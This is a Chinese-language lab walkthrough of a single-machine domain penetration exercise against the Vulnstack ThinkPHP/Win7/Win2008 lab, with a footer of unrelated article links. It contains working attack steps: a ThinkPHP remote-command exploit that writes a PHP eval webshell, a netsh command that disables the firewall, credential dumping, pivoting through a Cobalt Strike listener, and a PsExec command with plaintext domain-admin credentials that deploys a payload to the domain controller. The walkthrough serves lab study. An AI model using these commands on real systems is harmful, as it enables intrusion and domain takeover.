单机域渗透练习

简介: 单机域渗透练习

环 境

Win7 +phpstudy+thinkphp(5.0.22) 双网卡

ip  192.168.5.139       桥接模式

ip  192.168.138.136   仅主机模式

Win2008                  仅主机模式

ip 192.168.5.139

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

首先访问url

http://192.168.5.139/

Goby扫描 发现tp5.x 远程命令执行

查看目录后 写入一句话


echo "<?php @eval($_POST['123']);?>" >C://phpStudy//PHPTutorial//WWW//public//shell.php


菜刀连接

查看存活主机


查看详细ip地址  ipconfig  /all  可以看到域  (忘了截图)

查找域ip  ping sun.com

查看域内用户

640.png

提权system 查看进程无杀毒软件

CS制作木马 一直连不上

发现防火墙没有关闭 直接关闭

netsh firewall set opmode disable

获取域用户密码

提权SYSTEM

内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口

Win7  双网卡 dc 内网 这个时候就让dc主动链接cs 可以通过win7 中转会话

win7  进入中专 建立监听 监听地址6666

再次生成木马 选择刚才的监听 6666

把木马和工具上传到win7

640.png

刚才我们看到了域内有三个用户 这里的用户就是域内用户 密码在上面已经抓取出来了

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138-u sun\Administrator -p admin@123 -d -c C:\phpStudy\PHPTutorial\WWW\public\dc.exe

抓取密码 可以看到dc的密码了域控也就到手了

相关文章
|
2月前
|
存储 监控 安全
查看并处理分布式网络中的内部威胁
查看并处理分布式网络中的内部威胁
38 1
|
5月前
|
安全 算法 网络安全
数字堡垒之下:网络安全漏洞与防御策略
在数字时代的浪潮中,网络安全成为了保护个人隐私和企业资产的关键战场。本文将深入浅出地探讨网络安全的薄弱环节,揭示加密技术的强大盾牌作用,并强调安全意识的重要性。通过分析真实案例,我们将一窥网络攻防的奥秘,并提出实用的防御建议,旨在为读者构建一道坚不可摧的数字防线。
|
7月前
|
SQL 安全 算法
数字堡垒之下:网络安全漏洞与防御策略解析
在数字化时代的浪潮中,网络安全成为保障信息资产不受威胁的关键防线。本文深入探讨了网络安全的薄弱环节,包括软件漏洞、加密技术的应用与局限,以及提升个人与企业的安全意识。通过对这些关键领域的分析,旨在为读者提供一系列实用的防御策略,以强化数字世界的安全屏障。
|
8月前
|
监控 安全 Linux
【专栏】拿到一台新的物理服务器,有几项关键的准备工作和安全措施是必须要做的
【4月更文挑战第28天】新服务器部署前,需进行系统初始化(安装OS、网络配置、用户管理)、安全加固(更新补丁、关闭不必要的服务、防火墙设置)和性能优化(调整内核参数、文件系统优化)。同时,设置监控系统(如Nagios)以检查硬件和软件资源,制定备份策略确保数据安全。这些步骤确保服务器稳定、安全、高效运行。
278 1
|
安全 网络协议 Shell
|
存储 SQL 网络协议
内网渗透|初识域基础及搭建简单域
内网渗透|初识域基础及搭建简单域
311 0
|
云安全 分布式计算 资源调度
TeamTNT变种攻击Hadoop集群,云上服务对外开放需谨慎
近日,阿里云安全监测到TeamTNT变种,除了沿用之前攻击手法,最新利用了Hadoop Yarn未授权访问漏洞进行传播,同时使用多个域名和IP确保恶意文件落地,对脚本进行二进制化封装以对抗主机端检测。
584 0
TeamTNT变种攻击Hadoop集群,云上服务对外开放需谨慎
|
网络安全 安全 网络架构
带你读《网络防御与安全对策:原理与实践(原书第3版)》之三:防火墙基础
本书全面介绍了网络防御和保护网络的方法,内容包括网络安全的基本知识、虚拟专用网络、物理安全和灾备、恶意软件防范以及防火墙和入侵检测系统,加密的基础知识,对网络的攻击、用于确保安全的设备和技术,安全策略的概貌如何评估网络安全,基于计算机的取证等。每一章的末尾都给出了多项选择题、练习、项目和一个案例研究。
|
关系型数据库 Oracle 数据库
公司域服务器瘫痪后pdm服务器的恢复过程
我所在的公司的产品是工业级的工具(产品的复杂度来说,比电钻复杂很多,比汽车简单),生产模式属于按单生产,采用SAP和PDM作为公司运行的两个主要平台。上周六公司内网的域服务器瘫痪,准确的说是辅助域控制器瘫痪,因为主域控制器早在多年前就瘫痪了。
1514 0